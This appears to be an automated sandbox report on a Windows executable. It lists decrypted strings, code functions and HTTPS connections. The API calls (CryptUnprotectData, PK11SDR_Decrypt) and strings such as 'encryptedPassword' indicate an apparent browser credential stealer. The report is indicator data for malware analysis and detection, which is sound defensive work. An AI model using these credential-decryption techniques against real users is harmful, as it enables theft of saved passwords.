Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: j'6Ohl;5e
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: .\|tI1JU}h
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ;2'-
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: JLl`{
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: :Z1i=
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor:
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: eCaps
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: V7b4y+1fE#
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: K
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: PSVENLtpKT9
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 1&\
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: vH?ow
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 9RP7vgNYST
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: \|bT7DT^teg
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: mt{r
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 00Y>R{`\|5ex\PNfX#G):
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: *H9=f$4
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: H1Mlt{zld5
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: DH}q
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: X{GfzucQp{XV4
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: dmh o?"^}?
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: U8W9~zv
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: g3*
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: a7PADO\|oTe~NWNP
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {C,2nkn!$
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: n[V,3h
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: zo}Mqcb
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: h}v
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: md"ar<c
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: E5NHtUtwwyHoV1L
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: twkJ
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: TQ
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 0=r,pd5EL
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 2First
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: s}
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: DeleteFilJd
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: FindNextFile'
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: LvILXc
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: >th*w+;qb=v8&x`R
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: bb
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Ex&\
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ointer
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: F6M
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Jtt0
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: bsm`
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: KJS03z>qy~vDv~vfq4
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: :6(7fnkY-L
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: rror
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: yl3X
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: WideCharToMultiByMg
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ve<xiy9
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: \|
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: n-n
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ic2n
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: aVus
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {HA
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: l`AihM
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 0~5^26];
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: co`ttticlcp
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: X
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: "{lz<gD
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: a~fh
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: s98
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 1f524!3m9@'{5[
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: C'CXA.
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: &OKpl0
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: mo:<~1A{ve.&!Af:l
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Eqm
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: U7
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ~ma`zz~ahq3JBlYs
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: f
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: qyghyqv~
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ot
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: k0Nbnb$Grc
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: isycvzvwvtq
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ZVM61FskyCW
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 3b6bZxfS{S{
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: oD7K
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: %u3=ghKt\|fr?
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Ka^kr{
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: FGZJ<<kdCukAT2
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: D
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: v=Ed>huspkkS\|Qep
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: AGSh?yr
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: xar\|h{PIUy}g
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: VBx
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: v7.
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: tlTajkX7NYx
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: *t`=crqQ
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {c/
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: oBS}fl
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: g@yhc
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: r323N@hDXM
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: x1oagA^
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: aS;zs5
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: mrDj,)0n
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: xI($
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: xy3WI7+oclwN
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 2jgQmava:
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Kc{
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: XS0$nQ
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: &z*2l:Bh?
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: C[4NPR
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: sD!E
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: =<>rP`fg2ww
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: y74
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ])ids;okuaqk
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: nns}
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: /Cd2k
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: lqi)_\|ox
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: pk
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: bcl7;ga
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: wx
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: d{qSdzb2i
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: HZu 2e
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: '3/1
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: sGI;MSrCH#
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: o}G#b(jFl
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: DF0Zp
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: >(YZGao
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: cpAc
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: eSlot
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: $_?L!Bdb&
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: hy
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Wl{tu
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ew@r#
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: z{u~lv\|gq
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: _J1g
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: `aO]C]s\QS/w`Q7,k
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: gPJ:tox-7
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: bqQY}gH
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Wj4h
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: jle-&
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 4'7<6cy
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: gcuhtkwvl}tjfyzcpb`znzgmrldkabtsul
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {n\|~fegjj{ftic`i}gts`}fdd`dh{cfz
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ~c~~vdexteye~{{`szpf
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: vo{QFSc}T
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: dnqs
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: yW{MQkZ'pM`344dW6Cxdw-AhirOGZ< Ih;3=R^ >GVh+/i\,BBGor?aZI`}\|@y=RU
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: R>Ozgrywbwb{yTRS?bkO&IVIE='1h^ZTICs[NAE+GYMYYD
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: !tv!heZbxVKpTj&Jb*
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: !#$'
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ETGDbI2
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: i\|
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: vnzrztupa
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: R2LVMGJE
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: !K(WFRJyv6;C\|v-MCQD]'^K
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: fjj)
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: zlmy~qpuvvavtrlsoulg
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: v^AE$[
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 4@PHV71
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: y{dzf~`eubwjy\|bq}frea
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: paezg~xu}icic~xb`}xc`}dpf\|psgq
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: bwX+6^L#MJsc+ou3%6
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ^ug:VVdFTu3h~\|8 zJ,l Ufd}j~r)+0V0
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: $xZ-2uCZTaZ[ ZeGtm+#&?)
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: c]?pD`XwLylf/l!4}L
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: ocfw40\
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: q
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Q5Ahq
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: son
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: AAN6x
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: A(:
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: a
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {zxrshnn}lg{e\|ma`kzcqfw{\|{
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: dxeyf
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: qfbs
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: *JVA^
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: t)i{eEg+Eg+5XU7y3.xK=RLt^<\|3X\Xaj0xO8<0<?D$qz;P
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: JlGB<{]dik?J{k{STdde~D1E4(5tjtNvldrix
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: \|=
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: vx
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Tla
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: \|u
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Fk~y)ilgreJDcdnZUVXi
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 1ivoXbsoln}
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 4BJ7
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: P^6^hMdK'U-\|d
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: lcrcnM/x=
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: g#,F~b
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: shK`z1vm9wkBg
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {wd{{zw
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: em Summary:
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: pXOV7
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: .'4MY
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Dt
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 0P3eN<Q8QV
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: g;>
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: j
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: IepVB
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: <\A:U&8Mz<='nf
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: #LTFk`~p
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: j[#"[X
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: iq~%6
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: EFA713Q
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: XMZ=
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: Jbcbqd,Km
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: z
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 0WC9Q1A4
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: (OBA
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: x/YkpdqhZub
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: gIR6k@#piLL
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: B}!w
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: {1%?$*l
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 8AS
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: pz`
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 8=!@yk%~-/X
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: .]wg$E3
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: open
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: 3CY<wB8E
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: jQ
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: rqkkzJjiciO
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: gsy=DPTK-
Source: 0.2.DbMBWMxoNv.exe.400000.1.raw.unpack	String decryptor: FILES%

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_0040A2B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00419030
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	0_2_0040C920
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0040A210
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_004072A0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF8A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CF8A9A0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF844C0 PK11_PubEncrypt,	0_2_6CF844C0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF84440 PK11_PrivDecrypt,	0_2_6CF84440
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF54420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CF54420
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFD25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CFD25B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF6E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CF6E6E0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF68670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CF68670
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF8A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CF8A650
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFAA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CFAA730
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFB0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CFB0180
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF843B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CF843B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFA7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CFA7C00
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF67D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CF67D60
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFABD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CFABD30
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CFA9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CFA9EC0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_6CF83FF0 PK11_PrivDecryptPKCS1,	0_2_6CF83FF0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Unpacked PE file: 0.2.DbMBWMxoNv.exe.400000.1.unpack

Source: DbMBWMxoNv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.7:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.7:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.7:50081 version: TLS 1.2
